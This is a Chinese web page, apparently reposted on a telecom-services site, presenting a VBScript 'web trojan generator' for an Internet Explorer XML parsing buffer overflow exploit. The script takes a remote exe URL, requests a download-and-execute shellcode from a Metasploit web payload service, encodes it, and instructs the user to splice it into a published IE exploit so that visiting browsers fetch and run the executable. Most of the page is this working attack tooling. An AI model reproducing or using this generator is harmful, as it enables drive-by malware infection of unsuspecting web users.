• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营

    • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
    'code by lcx

    On Error Resume Next
    Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
    url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29MODULE=win32_downloadexecMODE=GENERATEOPT_URL="URLEncoding(Exeurl)"MaxSize=BadChars=0x00+ENCODER=defaultACTION=Generate+Payload"


    Body = getHTTPPage(url)
    Set Re = New RegExp
    Re.Pattern = "(\$shellcode \=[\s\S]+/div>/pre>)"

    Set Matches = Re.Execute(Body)
    If Matches.Count>0 Then Body = Matches(0).value

    code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"/div>/pre>",""),Chr(10),""),".",""))

    function replaceregex(str)
    set regex=new regExp
    regex.pattern="\\x(..)\\x(..)"
    regex.IgnoreCase=true
    regex.global=true
    matches=regex.replace(str,"%u$2$1")
    replaceregex=matches
    end Function


    Function getHTTPPage(Path)
    t = GetBody(Path)
    getHTTPPage = BytesToBstr(t, "GB2312")
    End Function

    Function GetBody(url)
    On Error Resume Next
    Set Retrieval = CreateObject("Microsoft.XMLHTTP")
    With Retrieval
    .Open "Get", url, False, "", ""
    .Send
    GetBody = .ResponseBody
    End With
    Set Retrieval = Nothing
    End Function

    Function BytesToBstr(Body, Cset)
    Dim objstream
    Set objstream = CreateObject("adodb.stream")
    objstream.Type = 1
    objstream.Mode = 3
    objstream.Open
    objstream.Write Body
    objstream.Position = 0
    objstream.Type = 2
    objstream.Charset = Cset
    BytesToBstr = objstream.ReadText
    objstream.Close
    Set objstream = Nothing
    End Function

    Function URLEncoding(vstrIn)
    strReturn = ""
    For aaaa = 1 To Len(vstrIn)
    ThisChr = Mid(vStrIn,aaaa,1)
    If Abs(Asc(ThisChr)) HFF Then
    strReturn = strReturn ThisChr
    Else
    innerCode = Asc(ThisChr)
    If innerCode 0 Then
    innerCode = innerCode + H10000
    End If
    Hight8 = (innerCode And HFF00)\ HFF
    Low8 = innerCode And HFF
    strReturn = strReturn "%" Hex(Hight8) "%" Hex(Low8)
    End If
    Next
    URLEncoding = strReturn
    End Function

    set fso=CreateObject("scripting.filesystemobject")
    set fileS=fso.opentextfile("a.txt",2,true)
    fileS.writeline replaceregex(code)
    'fileS.writeline body
    wscript.echo replaceregex(code)
    files.close
    set fso=Nothing

    wscript.echo Chr(13)"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"
    上一篇:vbscript LoadPicture函数使用方法与漏洞利用
    下一篇:可自删除 开启3389创建用户粘滞键后门的vbs
  • 相关文章
    • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day 网马生,成器,Internet,Explorer,